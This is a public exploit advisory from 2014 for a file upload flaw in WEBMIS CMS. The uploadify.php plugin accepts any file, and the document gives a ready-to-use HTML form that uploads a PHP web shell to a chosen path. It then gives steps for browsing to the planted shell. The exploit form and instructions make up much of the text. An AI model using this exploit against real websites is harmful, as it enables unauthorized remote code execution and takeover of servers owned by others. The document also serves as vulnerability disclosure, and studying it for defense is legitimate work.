WEBMIS CMS suffers from a remote shell upload vulnerability.
96392e19f615236ba519d6d55815c7771af73e6df1a82b98a57fd26dfbc83d08
##################################################################################################
#Exploit Title : WEBMIS CMS Shell Upload vulnerability
#Author : Jagriti Sahu
#Vendor : http://www.ksphp.com
#Download Link : https://github.com/ksphp/webmis
#version affected : all
#Date : 14/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
WEBMIS is the underlying PHP development system, multi-user,
development of CI model MVC multiple access scheme based on, can add
background management menu, the integration of Jquery, TinyMCE editor
plugin, concise, beautiful bomb box effect!
This CMS is affected from remote file upload vulnerability and attacker
can upload php shell to website easily
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to webmis/plugin/uploadify/uploadify.php file in
which there is no check during file upload
attacker need to forward file upload request to this file with PHP
shell and file upload path
///////////////////////
/// exploit code ////
///////////////////////
<form
action="http://localhost/webmis_installation/plugin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type=text name="path" value="/webmis_installation/plugin/">
<input type=text name="someKey" value="someValue"]>
<input type="submit" name="submit" value="Submit">
</form>
save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click
submit button
shell will be uploaded in uploads directory
http://localhost/webmis_installation/plugin/shell.php